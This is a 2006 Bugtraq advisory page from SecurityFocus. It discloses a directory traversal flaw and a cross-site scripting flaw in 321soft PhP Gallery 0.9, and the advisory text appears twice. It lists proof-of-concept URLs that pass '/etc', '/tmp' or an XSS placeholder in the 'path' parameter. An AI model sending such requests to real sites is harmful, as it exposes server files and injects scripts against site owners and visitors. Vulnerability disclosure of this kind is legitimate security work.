Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
321soft PhP Gallery 0.9 - directory travel & XSS
May 02 2006 11:41PM
d4igoro gmail com
321soft PhP Gallery 0.9 - directory travel & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory travel & XSS
Date: Mai 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risc: Middle
credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp
http://[target]/index.php?path=[XSS]
solution:
----------------------------
index.php
fix $path
notes:
----------------------------
The vendor has been informed.
http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.htm
l
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory travel & XSS
Date: Mai 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risc: Middle
credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp
http://[target]/index.php?path=[XSS]
solution:
----------------------------
index.php
fix $path
notes:
----------------------------
The vendor has been informed.
http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.htm
l
[ reply ]